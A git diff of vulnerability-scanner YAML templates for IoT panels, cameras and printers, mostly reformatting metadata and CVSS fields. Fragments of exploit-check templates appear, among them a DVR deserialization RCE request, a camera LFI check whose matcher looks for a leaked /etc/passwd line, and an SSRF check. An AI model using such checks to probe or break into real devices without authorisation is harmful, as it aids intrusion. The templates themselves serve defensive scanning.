https://www.exploit-db.com/ghdb/6889 - tags: iot,printer,tech metadata: max-request: 1 + tags: iot,printer,tech http: - method: GET @@ -22,4 +22,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/brother-unauthorized-access.yaml b/http/iot/brother-unauthorized-access.yaml index fe58d71da3..d4f3e36a57 100644 --- a/http/iot/brother-unauthorized-access.yaml +++ b/http/iot/brother-unauthorized-access.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: medium reference: https://www.exploit-db.com/ghdb/6889 - tags: iot,printer,unauth metadata: max-request: 1 + tags: iot,printer,unauth http: - method: GET diff --git a/http/iot/codian-mcu-login.yaml b/http/iot/codian-mcu-login.yaml index b6cb6a5f1a..1f34580b25 100644 --- a/http/iot/codian-mcu-login.yaml +++ b/http/iot/codian-mcu-login.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/7404 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -26,6 +26,7 @@ http: - type: word words: - 'Codian MCU - login:' + - type: status status: - 200 diff --git a/http/iot/contacam.yaml b/http/iot/contacam.yaml index c65155674d..8027b7304b 100644 --- a/http/iot/contacam.yaml +++ b/http/iot/contacam.yaml @@ -11,14 +11,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: edb,iot metadata: max-request: 1 + tags: edb,iot http: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word @@ -28,4 +29,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/envision-gateway.yaml b/http/iot/envision-gateway.yaml index dde4b5c1ae..40cad7656f 100644 --- a/http/iot/envision-gateway.yaml +++ b/http/iot/envision-gateway.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/7315 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -26,6 +26,7 @@ http: - type: word words: - 'EnvisionGateway' + - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/epmp-login.yaml b/http/iot/epmp-login.yaml index 19d1054d26..fc4944a3bc 100644 --- a/http/iot/epmp-login.yaml +++ b/http/iot/epmp-login.yaml @@ -5,15 +5,15 @@ info: author: dhiyaneshDk severity: info description: ePMP 2000 login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.exploit-db.com/ghdb/6826 - tags: panel,edb,iot + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 + tags: panel,edb,iot http: - method: GET @@ -29,4 +29,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/epson-wf-series.yaml b/http/iot/epson-wf-series.yaml index 311ca383ff..3726ea1b55 100644 --- a/http/iot/epson-wf-series.yaml +++ b/http/iot/epson-wf-series.yaml @@ -5,9 +5,9 @@ info: author: aashiq severity: info description: Searches for Epson WF series printers on the domain - tags: iot,printer metadata: max-request: 1 + tags: iot,printer http: - method: GET @@ -22,4 +22,4 @@ http: - type: word words: - - "SEIKO EPSON" \ No newline at end of file + - "SEIKO EPSON" diff --git a/http/iot/heatmiser-wifi-thermostat.yaml b/http/iot/heatmiser-wifi-thermostat.yaml index 896586624a..e1a2967118 100644 --- a/http/iot/heatmiser-wifi-thermostat.yaml +++ b/http/iot/heatmiser-wifi-thermostat.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/7445 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -26,6 +26,7 @@ http: - type: word words: - 'Heatmiser Wifi Thermostat' + - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/homeworks-illumination.yaml b/http/iot/homeworks-illumination.yaml index b2cc7fac40..6316f61d34 100644 --- a/http/iot/homeworks-illumination.yaml +++ b/http/iot/homeworks-illumination.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.lutron.com metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"HomeWorks Illumination Web Keypad" tags: misconfig,iot,homeworks diff --git a/http/iot/hp-color-laserjet-detect.yaml b/http/iot/hp-color-laserjet-detect.yaml index 83d3a44dc4..e5ddc0fe5a 100644 --- a/http/iot/hp-color-laserjet-detect.yaml +++ b/http/iot/hp-color-laserjet-detect.yaml @@ -8,8 +8,8 @@ info: - http://www.hp.com/ - https://www.hp.com/us-en/shop/cv/printers metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"HP Color LaserJet" google-query: intitle:"HP Color LaserJet" tags: iot,hp @@ -23,6 +23,7 @@ http: stop-at-first-match: true redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/iot/hp-device-info-detect.yaml b/http/iot/hp-device-info-detect.yaml index 9b6230ea6b..f17f592f5f 100644 --- a/http/iot/hp-device-info-detect.yaml +++ b/http/iot/hp-device-info-detect.yaml @@ -5,14 +5,15 @@ info: author: pussycat0x severity: low reference: https://www.exploit-db.com/ghdb/6905 - tags: iot,hp metadata: max-request: 1 + tags: iot,hp http: - method: GET path: - "{{BaseURL}}/hp/device/DeviceInformation/View" + matchers-condition: and matchers: - type: word diff --git a/http/iot/hp-laserjet-detect.yaml b/http/iot/hp-laserjet-detect.yaml index eaefa6b3b1..6045385f49 100644 --- a/http/iot/hp-laserjet-detect.yaml +++ b/http/iot/hp-laserjet-detect.yaml @@ -5,26 +5,28 @@ info: author: dhiyaneshDk severity: info description: HP LaserJet Professional panel was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.exploit-db.com/ghdb/6459 - tags: iot,edb + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 + tags: iot,edb http: - method: GET path: - "{{BaseURL}}/SSI/index.htm" + matchers-condition: and matchers: - type: word words: - 'HP LaserJet Professional' part: body + - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/internet-service.yaml b/http/iot/internet-service.yaml index c380c5e770..b1980b9b3e 100644 --- a/http/iot/internet-service.yaml +++ b/http/iot/internet-service.yaml @@ -5,16 +5,16 @@ info: author: dhiyaneshDK severity: info description: Fuji Xerox Internet Services panel was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.exploit-db.com/ghdb/5948 - https://www.support.xerox.com/en-us/article/en/1852141 - tags: iot,edb,panel + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 + tags: iot,edb,panel http: - method: GET @@ -26,6 +26,7 @@ http: - type: word words: - 'Internet Services' + - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/iotawatt-app-exposure.yaml b/http/iot/iotawatt-app-exposure.yaml index d7b773efac..b749583b11 100644 --- a/http/iot/iotawatt-app-exposure.yaml +++ b/http/iot/iotawatt-app-exposure.yaml @@ -32,4 +32,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/kevinlab-device-detect.yaml b/http/iot/kevinlab-device-detect.yaml index 950b516ffd..e632f92535 100644 --- a/http/iot/kevinlab-device-detect.yaml +++ b/http/iot/kevinlab-device-detect.yaml @@ -4,11 +4,10 @@ info: name: KevinLAB Devices Detection author: gy741 severity: info - description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings - by collecting and analyzing various information of energy usage and facilities as well as efficiency and indoor environment control. - tags: iot,kevinlab + description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings by collecting and analyzing various information of energy usage and facilities as well as efficiency and indoor environment control. metadata: max-request: 2 + tags: iot,kevinlab http: - method: GET diff --git a/http/iot/liveview-axis-camera.yaml b/http/iot/liveview-axis-camera.yaml index 455f8eec53..39803f2c38 100644 --- a/http/iot/liveview-axis-camera.yaml +++ b/http/iot/liveview-axis-camera.yaml @@ -9,13 +9,12 @@ info: - https://www.exploit-db.com/ghdb/6843 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 tags: axis,edb,iot - http: - method: GET path: @@ -25,6 +24,7 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: or matchers: - type: dsl @@ -46,4 +46,4 @@ http: part: body group: 1 regex: - - 'AXIS (.*) Network Camera' \ No newline at end of file + - 'AXIS (.*) Network Camera' diff --git a/http/iot/loytec-device.yaml b/http/iot/loytec-device.yaml index 73de173001..ecd37697d9 100644 --- a/http/iot/loytec-device.yaml +++ b/http/iot/loytec-device.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "loytec" tags: iot,loytec diff --git a/http/iot/mobotix-guest-camera.yaml b/http/iot/mobotix-guest-camera.yaml index 1132677315..172553fd08 100644 --- a/http/iot/mobotix-guest-camera.yaml +++ b/http/iot/mobotix-guest-camera.yaml @@ -9,16 +9,17 @@ info: - https://www.exploit-db.com/ghdb/6848 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: iot,edb metadata: max-request: 1 + tags: iot,edb http: - method: GET path: - '{{BaseURL}}/cgi-bin/guestimage.html' + matchers-condition: and matchers: - type: word @@ -27,4 +28,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/netsurveillance-web.yaml b/http/iot/netsurveillance-web.yaml index beec23a8eb..163022a516 100644 --- a/http/iot/netsurveillance-web.yaml +++ b/http/iot/netsurveillance-web.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/7288 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -30,4 +30,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/network-camera-detect.yaml b/http/iot/network-camera-detect.yaml index 31e52a0161..360e00fda0 100644 --- a/http/iot/network-camera-detect.yaml +++ b/http/iot/network-camera-detect.yaml @@ -4,14 +4,15 @@ info: name: Various Online Devices Detection (Network Camera) author: iamthefrogy severity: info - tags: iot metadata: max-request: 1 + tags: iot http: - method: GET path: - "{{BaseURL}}/CgiStart?page=Single" + host-redirects: true max-redirects: 2 matchers: diff --git a/http/iot/novus-ip-camera.yaml b/http/iot/novus-ip-camera.yaml index af17b93222..7bc78811da 100644 --- a/http/iot/novus-ip-camera.yaml +++ b/http/iot/novus-ip-camera.yaml @@ -5,15 +5,15 @@ info: author: DhiyaneshDk severity: info description: NoVus IP login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.exploit-db.com/ghdb/8002 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 google-query: intitle:"NoVus IP camera" -com tags: camera,novus,edb,iot,panel @@ -35,4 +35,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/nuuno-network-login.yaml b/http/iot/nuuno-network-login.yaml index 8d740c7278..2e65b03e1b 100644 --- a/http/iot/nuuno-network-login.yaml +++ b/http/iot/nuuno-network-login.yaml @@ -5,15 +5,15 @@ info: author: dhiyaneshDK severity: info description: NUUO Network Video Recorder login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.exploit-db.com/ghdb/6840 - tags: iot,panel,nuuo,edb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 + tags: iot,panel,nuuo,edb http: - method: GET @@ -29,4 +29,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/octoprint-3dprinter-detect.yaml b/http/iot/octoprint-3dprinter-detect.yaml index 2da7c68e95..1f00976fbf 100644 --- a/http/iot/octoprint-3dprinter-detect.yaml +++ b/http/iot/octoprint-3dprinter-detect.yaml @@ -7,7 +7,7 @@ info: description: Octoprint 3D Printer panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -23,6 +23,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -32,4 +33,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/open-mjpg-streamer.yaml b/http/iot/open-mjpg-streamer.yaml index f106ee9162..3a70e2ef70 100755 --- a/http/iot/open-mjpg-streamer.yaml +++ b/http/iot/open-mjpg-streamer.yaml @@ -7,9 +7,9 @@ info: description: Open mjpg-streamer service sharing webcam/camera feed reference: - https://github.com/jacksonliam/mjpg-streamer - tags: iot,webcam metadata: max-request: 1 + tags: iot,webcam http: - method: GET @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/?action=stream" max-size: 2048 + matchers-condition: and matchers: - type: word diff --git a/http/iot/panasonic-network-management.yaml b/http/iot/panasonic-network-management.yaml index e0a898b4f3..a6108cddf4 100644 --- a/http/iot/panasonic-network-management.yaml +++ b/http/iot/panasonic-network-management.yaml @@ -11,20 +11,22 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: iot,camera,panasonic,edb metadata: max-request: 1 + tags: iot,camera,panasonic,edb http: - method: GET path: - "{{BaseURL}}/config/cam_portal.cgi" + matchers-condition: and matchers: - type: word words: - 'Panasonic Network Camera Management System' part: body + - type: status status: - 200 diff --git a/http/iot/pqube-power-analyzers.yaml b/http/iot/pqube-power-analyzers.yaml index 9209cb0d5f..3857e3b06d 100644 --- a/http/iot/pqube-power-analyzers.yaml +++ b/http/iot/pqube-power-analyzers.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"PQube 3" tags: iot,exposure diff --git a/http/iot/qvisdvr-deserialization-rce.yaml b/http/iot/qvisdvr-deserialization-rce.yaml index c7cbdb6f52..5ebb94d70b 100644 --- a/http/iot/qvisdvr-deserialization-rce.yaml +++ b/http/iot/qvisdvr-deserialization-rce.yaml @@ -10,11 +10,11 @@ info: - https://twitter.com/Me9187/status/1414606876575162373 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: qvisdvr,rce,deserialization,jsf,iot metadata: max-request: 2 + tags: qvisdvr,rce,deserialization,jsf,iot http: - raw: @@ -22,7 +22,6 @@ http: GET /qvisdvr/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1 Host: {{Hostname}} @@ -41,7 +40,6 @@ http: matchers-condition: and matchers: - - type: word part: interactsh_protocol words: diff --git a/http/iot/raspberry-shake-config.yaml b/http/iot/raspberry-shake-config.yaml index a37fc92bf7..773f707cc8 100644 --- a/http/iot/raspberry-shake-config.yaml +++ b/http/iot/raspberry-shake-config.yaml @@ -7,8 +7,8 @@ info: description: | The Shake Board digitizer receives, processes, and interprets the sensor data in real-time, allowing for the Raspberry Pi computer to export the data for easy access. The data output can be displayed and analyzed using our own comprehensive set of web tools or any standard seismological software. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Raspberry Shake Config" tags: misconfig,unauth,iot,raspberry diff --git a/http/iot/routeros-login.yaml b/http/iot/routeros-login.yaml index 1aa669edf3..3f3ef4fd88 100644 --- a/http/iot/routeros-login.yaml +++ b/http/iot/routeros-login.yaml @@ -7,7 +7,7 @@ info: description: RouterOS router login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -33,4 +33,4 @@ http: - type: regex group: 1 regex: - - '

RouterOS v(.+)<\/h1>' \ No newline at end of file + - '

RouterOS v(.+)<\/h1>' diff --git a/http/iot/selea-ip-camera.yaml b/http/iot/selea-ip-camera.yaml index d9f72f8108..c16227c57e 100644 --- a/http/iot/selea-ip-camera.yaml +++ b/http/iot/selea-ip-camera.yaml @@ -7,9 +7,9 @@ info: description: Various version of the Selea Targa IP OCR-ANPR Camera are vulnerable to an Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure flaw reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php - tags: iot,selea,targa metadata: max-request: 1 + tags: iot,selea,targa http: - method: GET @@ -25,10 +25,12 @@ http: - "selea_httpd" - "HttpServer/0.1" condition: or + - type: word part: body words: - "Selea CarPlateServer" + - type: status status: - 200 diff --git a/http/iot/snapdrop-detect.yaml b/http/iot/snapdrop-detect.yaml index 480956775d..8d91fcd8ee 100644 --- a/http/iot/snapdrop-detect.yaml +++ b/http/iot/snapdrop-detect.yaml @@ -5,8 +5,8 @@ info: author: tess severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Snapdrop" tags: iot,snapdrop diff --git a/http/iot/stem-audio-table-private-keys.yaml b/http/iot/stem-audio-table-private-keys.yaml index 859e83ac3e..1371e163c9 100644 --- a/http/iot/stem-audio-table-private-keys.yaml +++ b/http/iot/stem-audio-table-private-keys.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://blog.grimm-co.com/2021/06/the-walls-have-ears.html - tags: stem,config,exposure,iot metadata: max-request: 1 + tags: stem,config,exposure,iot http: - method: GET diff --git a/http/iot/targa-camera-lfi.yaml b/http/iot/targa-camera-lfi.yaml index 98b397a020..01042b3d24 100644 --- a/http/iot/targa-camera-lfi.yaml +++ b/http/iot/targa-camera-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: targa,lfi,iot,camera,selea metadata: max-request: 1 + tags: targa,lfi,iot,camera,selea http: - method: GET @@ -22,11 +22,10 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/targa-camera-ssrf.yaml b/http/iot/targa-camera-ssrf.yaml index d00dc688ee..a4f2972361 100644 --- a/http/iot/targa-camera-ssrf.yaml +++ b/http/iot/targa-camera-ssrf.yaml @@ -4,15 +4,12 @@ info: name: Selea Targa IP OCR-ANPR Camera - Unauthenticated SSRF author: gy741 severity: high - description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters - 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application - to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through - the affected application. + description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php - tags: targa,ssrf,oast,iot,camera,selea metadata: max-request: 1 + tags: targa,ssrf,oast,iot,camera,selea http: - raw: diff --git a/http/iot/ulanzi-clock.yaml b/http/iot/ulanzi-clock.yaml index 0b38c9d258..765a518a90 100644 --- a/http/iot/ulanzi-clock.yaml +++ b/http/iot/ulanzi-clock.yaml @@ -4,9 +4,9 @@ info: name: Ulanzi Clock Detect author: fabaff severity: info - tags: panel,ulanzi,iot metadata: max-request: 1 + tags: panel,ulanzi,iot http: - method: GET diff --git a/http/iot/upnp-device.yaml b/http/iot/upnp-device.yaml index 892275afbe..911f28c172 100644 --- a/http/iot/upnp-device.yaml +++ b/http/iot/upnp-device.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://www.upnp.org/specs/basic/UPnP-basic-Basic-v1-Device.pdf - tags: upnp,iot metadata: max-request: 1 + tags: upnp,iot http: - method: GET @@ -20,6 +20,7 @@ http: - type: status status: - 200 + - type: word words: - "urn:schemas-upnp-org:device-1-0" diff --git a/http/iot/webcamxp-5.yaml b/http/iot/webcamxp-5.yaml index 6d38b968eb..939938c2b2 100644 --- a/http/iot/webcamxp-5.yaml +++ b/http/iot/webcamxp-5.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/7448 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -26,6 +26,7 @@ http: - type: word words: - 'webcamXP 5' + - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/iot/xp-webcam.yaml b/http/iot/xp-webcam.yaml index ff0e0060c0..6813481f3b 100644 --- a/http/iot/xp-webcam.yaml +++ b/http/iot/xp-webcam.yaml @@ -5,9 +5,9 @@ info: author: aashiq severity: medium description: Searches for exposed webcams by querying the /mobile.html endpoint and the existence of webcamXP in the body. - tags: webcam,iot metadata: max-request: 1 + tags: webcam,iot http: - method: GET diff --git a/http/iot/zebra-printer-detect.yaml b/http/iot/zebra-printer-detect.yaml index 3631405688..73202ed920 100644 --- a/http/iot/zebra-printer-detect.yaml +++ b/http/iot/zebra-printer-detect.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.zebra.com/kr/ko/products/printers.html metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Zebra Technologies" tags: iot,zebra,printer diff --git a/http/miscellaneous/apple-app-site-association.yaml b/http/miscellaneous/apple-app-site-association.yaml index ba827693c1..ba4ccce676 100644 --- a/http/miscellaneous/apple-app-site-association.yaml +++ b/http/miscellaneous/apple-app-site-association.yaml @@ -4,9 +4,9 @@ info: name: Apple app site association for harvesting end points author: panch0r3d severity: info - tags: misc,apple metadata: max-request: 3 + tags: misc,apple http: - method: GET @@ -16,6 +16,7 @@ http: - "{{BaseURL}}/apple-app-site-association" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -38,4 +39,4 @@ http: extractors: - type: json json: - - .applinks.details[].appID \ No newline at end of file + - .applinks.details[].appID diff --git a/http/miscellaneous/aws-ecs-container-agent-tasks.yaml b/http/miscellaneous/aws-ecs-container-agent-tasks.yaml index 11b42d9802..4ec3ff0522 100644 --- a/http/miscellaneous/aws-ecs-container-agent-tasks.yaml +++ b/http/miscellaneous/aws-ecs-container-agent-tasks.yaml @@ -7,9 +7,9 @@ info: description: Aws container metadata content reference: - https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect - tags: aws,docker,ec2,misc metadata: max-request: 2 + tags: aws,docker,ec2,misc http: - method: GET @@ -25,4 +25,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/miscellaneous/clientaccesspolicy.yaml b/http/miscellaneous/clientaccesspolicy.yaml index cdaab67d75..f9bee05443 100644 --- a/http/miscellaneous/clientaccesspolicy.yaml +++ b/http/miscellaneous/clientaccesspolicy.yaml @@ -4,9 +4,9 @@ info: name: Silverlight cross-domain policy author: emadshanab severity: info - tags: misc metadata: max-request: 1 + tags: misc http: - method: GET @@ -24,4 +24,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/miscellaneous/crypto-mining-malware.yaml b/http/miscellaneous/crypto-mining-malware.yaml index dcbc6182f7..dc9ddcf232 100644 --- a/http/miscellaneous/crypto-mining-malware.yaml +++ b/http/miscellaneous/crypto-mining-malware.yaml @@ -18,6 +18,7 @@ http: - "{{BaseURL}}" redirects: true + matchers-condition: and matchers: - type: regex diff --git a/http/miscellaneous/defaced-website-detect.yaml b/http/miscellaneous/defaced-website-detect.yaml index 869995b8d0..bf205ed5e2 100644 --- a/http/miscellaneous/defaced-website-detect.yaml +++ b/http/miscellaneous/defaced-website-detect.yaml @@ -7,8 +7,8 @@ info: description: The detected website is defaced. metadata: verified: 'true' - shodan-query: http.title:"Hacked By" max-request: 1 + shodan-query: http.title:"Hacked By" tags: defacement,misc http: diff --git a/http/miscellaneous/detect-dns-over-https.yaml b/http/miscellaneous/detect-dns-over-https.yaml index 17bb7a8e36..ec06990920 100644 --- a/http/miscellaneous/detect-dns-over-https.yaml +++ b/http/miscellaneous/detect-dns-over-https.yaml @@ -9,14 +9,15 @@ info: reference: - https://developers.google.com/speed/public-dns/docs/doh/ - https://developers.cloudflare.com/1.1.1.1/dns-over-https/wireformat - tags: dns,doh,misc metadata: max-request: 1 + tags: dns,doh,misc http: - method: GET path: - "{{BaseURL}}/dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB" + headers: Accept: application/dns-message diff --git a/http/miscellaneous/dir-listing.yaml b/http/miscellaneous/dir-listing.yaml index b72b891953..de43907a56 100644 --- a/http/miscellaneous/dir-listing.yaml +++ b/http/miscellaneous/dir-listing.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://portswigger.net/kb/issues/00600100_directory-listing - tags: misc,generic metadata: max-request: 1 + tags: misc,generic http: - method: GET diff --git a/http/miscellaneous/email-extractor.yaml b/http/miscellaneous/email-extractor.yaml index 638e22cf13..f942918d39 100644 --- a/http/miscellaneous/email-extractor.yaml +++ b/http/miscellaneous/email-extractor.yaml @@ -4,9 +4,9 @@ info: name: Email Extractor author: panch0r3d severity: info - tags: misc,email,generic metadata: max-request: 1 + tags: misc,email,generic http: - method: GET diff --git a/http/miscellaneous/exposed-file-upload-form.yaml b/http/miscellaneous/exposed-file-upload-form.yaml index 12125bc826..17ac9fa712 100644 --- a/http/miscellaneous/exposed-file-upload-form.yaml +++ b/http/miscellaneous/exposed-file-upload-form.yaml @@ -5,8 +5,8 @@ info: author: geeknik severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"multipart/form-data" html:"file" tags: exposure,upload,form,misc,generic diff --git a/http/miscellaneous/external-service-interaction.yaml b/http/miscellaneous/external-service-interaction.yaml index 6c83d1007d..94e7a4bcec 100644 --- a/http/miscellaneous/external-service-interaction.yaml +++ b/http/miscellaneous/external-service-interaction.yaml @@ -22,7 +22,6 @@ http: headers: Host: "{{interactsh-url}}" - redirects: true max-redirects: 1 matchers: diff --git a/http/miscellaneous/firebase-database-extractor.yaml b/http/miscellaneous/firebase-database-extractor.yaml index 1916a44487..5fabde2a2c 100644 --- a/http/miscellaneous/firebase-database-extractor.yaml +++ b/http/miscellaneous/firebase-database-extractor.yaml @@ -5,9 +5,9 @@ info: author: rafaelwdornelas severity: info description: Extract Firebase Database - tags: firebase,misc metadata: max-request: 1 + tags: firebase,misc http: - method: GET diff --git a/http/miscellaneous/google-floc-disabled.yaml b/http/miscellaneous/google-floc-disabled.yaml index 359235b68f..ce17c0d7c8 100644 --- a/http/miscellaneous/google-floc-disabled.yaml +++ b/http/miscellaneous/google-floc-disabled.yaml @@ -7,9 +7,9 @@ info: description: The detected website has decided to explicitly exclude itself from Google FLoC tracking. reference: - https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/ - tags: google,floc,misc metadata: max-request: 1 + tags: google,floc,misc http: - method: GET diff --git a/http/miscellaneous/gpc-json.yaml b/http/miscellaneous/gpc-json.yaml index 744beff519..5efb8b3c99 100644 --- a/http/miscellaneous/gpc-json.yaml +++ b/http/miscellaneous/gpc-json.yaml @@ -7,8 +7,8 @@ info: description: | The website defines a Global Privacy Control policy. metadata: - max-request: 2 verified: true + max-request: 2 tags: misc,generic,gpc http: @@ -18,6 +18,7 @@ http: - "{{RootURL}}/gpc.json" stop-at-first-match: true + 